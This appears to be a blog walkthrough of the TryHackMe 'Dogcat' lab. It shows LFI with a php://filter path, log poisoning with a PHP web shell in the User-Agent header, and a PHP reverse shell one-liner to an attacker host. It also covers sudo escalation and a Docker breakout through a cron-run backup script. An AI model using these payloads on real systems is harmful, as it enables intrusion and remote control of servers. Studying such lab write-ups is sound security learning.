DogCat – Exploiting LFI and Docker Privilege Escalation -TryHackMe Walkthrough


In this walkthrough, we’ll explore the Dogcat room on TryHackMe, a box that features a Local File Inclusion (LFI) vulnerability and Docker privilege escalation. LFI allows us to read sensitive files from the system and eventually gain access to the server.There are a total of 4 flags in this machine which we need to find.

Let’s Dive in!

Step 1: Scanning the Target

Start by scanning the target machine to find open ports and services:

nmap -sV -p- <target-ip>

The scan reveals the following ports

Port 80: HTTP
Port 22: SSH

When you visit the website hosted on port 80, you’ll see a website which shows dog and cat pictures. Time to start web enumeration.

Step 2: Enumerating the Web

As we explore the Dogcat website, you’ll notice the URL follows a parameter-based format, which is a potential sign of vulnerabilities. Let’s test if we can exploit a Local File Inclusion (LFI) vulnerability to access sensitive files

Dogcat tryhackme walkthrough Exploitation front page

While testing for Local File Inclusion (LFI) vulnerabilities in the Dogcat room, I noticed that using the ../ directory traversal method only works when the URL contains a “dog” or “cat” keyword.

resulted in “file cannot be opened” errors. However, when I tried this:

?view=dog/../index

it triggered an error:
Fatal error: Cannot redeclare containsStr()

This error occurs because the containsStr() function is being declared multiple times in the same file, likely due to the index.php file being included multiple times by the LFI payload.

After researching, I found that using the php://filter wrapper allows you to bypass this issue. The php://filter wrapper can read a file’s source code without executing it, which prevents the function re declaration error. By applying this technique, you can safely read the source of index.php and continue exploiting the LFI vulnerability.

Dogcat tryhackme walkthrough Exploitation php wrapper
<target-IP>/?view=php://filter/convert.base64-encode/resource=dog/../../.././…var/www/html/index

This will allow you to see the index file

Dogcat tryhackme walkthrough Exploitation - index.php file

The Code suggests that to make the LFI work on other files we will need to put another variable $ext in the URL.

Dogcat tryhackme walkthrough Exploitation - LFI exploitation local file inclusion

Step 3: LFI (Local File Inclusion) to RCE( Remote code execution) – Log Poisoning

It took me some time to fully understand and exploit this vulnerability, but here’s the exact method that worked. A highly useful resource that helped me during this process was RevShells. This website allows you to generate different types of reverse shells easily and also provides options to encode and decode the payloads based on your requirements, making it invaluable for LFI exploitation and other penetration testing tasks.

Log poisoning is a powerful attack method where malicious input is injected into application logs, such as web server logs or application logs, with the intent of exploiting vulnerabilities like Local File Inclusion (LFI) or Remote Code Execution (RCE). Once an attacker is able to include or execute these poisoned logs via an LFI vulnerability, they can escalate the attack, potentially gaining full control over the target system.

Dogcat tryhackme walkthrough Exploitation  - sending request through developer tools

I used Developer Tools to check for log poisoning by injecting the string “Hello World” into the User-Agent header. I used User-Agent header because it directly reflects in the access.log files. During the LFI attack, I observed that the string injected in the User-Agent was successfully reflected back, confirming the vulnerability and providing a foothold for further exploitation.

Dogcat tryhackme walkthrough Exploitation  - log poisoning - injection in the access logs

I tried reverse shell through User-Agent but that didn’t work.
Then I injected this payload in the log

Dogcat tryhackme walkthrough Exploitation php cmd system
<?php system($_GET['cmd']); ?>

The payload above leverages the cmd parameter in the URL, allowing it to be passed to the PHP system() function. This enables the execution of system commands directly on the target server, providing a way to exploit vulnerabilities and gain further access. By appending cmd to the URL, attackers can inject and execute arbitrary commands, making it a critical method in Remote Code Execution (RCE) attacks.

Dogcat tryhackme walkthrough Exploitation -flag1

This is how to got first flag.

Step 4: Getting a Reverse Shell

After injecting system based payload getting a reverse shell was fairly easy. I used URL encoding of this payload to get a reverse shell:

php -r '$sock=fsockopen("attackerIP",attackerport);system("sh <&3 >&3 2>&3");

Turn up netcat listener on your machine:

Dogcat tryhackme walkthrough Exploitation  netcat listener

You will get Flag2 if you do cd ../ in another file.

Step 5: Privilege Escalation

The sudo -l command is used to list the commands a user is allowed to run with sudo without providing their password, helping in privilege escalation assessments.

sudo -l
Dogcat tryhackme walkthrough Exploitation  - sudo -l command
Dogcat tryhackme walkthrough Exploitation  flag3

Step 6: Docker Breakout

In the description of this machine, you would have noticed that this is a Docker environment:

Dogcat tryhackme walkthrough Exploitation - docker

After looking around the system, I found there is a backup file in /opt.

Dogcat tryhackme walkthrough Exploitation  launch.sh script

Upon inspecting the launch.sh file, you’ll notice that a volume is mounted from the Docker container to the host system. This is key for potential exploitation. The backup.sh script creates a tar archive of the /root/container directory, which is a critical clue for privilege escalation.

Although running crontab -e didn’t show anything, it’s likely that the host OS is executing the backup.sh script. This presents an opportunity to inject a bash reverse shell into the script. Before injecting, ensure you have a Netcat listener set up on your chosen port, ready to catch the reverse shell.

Bash Command used:

Dogcat tryhackme walkthrough Exploitation bash command injection to get the root access of the host

After insertion of bash, this is what the /backup.sh file looked like.

Dogcat tryhackme walkthrough Exploitation bash command reverse shell

You will have a reverse shell again but this time to the host machine!

Dogcat tryhackme walkthrough Exploitation reverse shell nc

That’s how you will get your 4th flag!